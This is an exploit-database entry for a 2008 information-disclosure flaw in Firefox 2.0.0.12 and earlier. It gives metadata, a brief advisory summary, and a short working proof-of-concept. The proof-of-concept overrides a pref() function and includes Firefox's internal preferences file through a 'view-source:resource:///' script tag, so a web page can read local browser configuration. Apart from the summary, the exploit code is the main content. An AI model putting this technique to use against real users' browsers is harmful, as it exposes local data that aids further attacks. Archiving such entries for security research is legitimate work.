Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure

Author: Ronald van den Heetkamp
type: remote
platform: linux
port: 
date_added: 2008-02-08 
date_updated: 2014-01-22 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/27700/info

Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local resources.

Attackers can exploit this issue to obtain potentially sensitive information that will aid in further attacks.

Firefox 2.0.0.12 and prior versions are vulnerable.

<script> /* @name: Firefox <= 2.0.0.12 information leak pOc @date: Feb. 07 2008 @author: Ronald van den Heetkamp @url: http://www.0x000000.com */ pref = function(a,b) { document.write( a + ' -> ' + b + '<br />'); }; </script> <script src="view-source:resource:///greprefs/all.js"></script>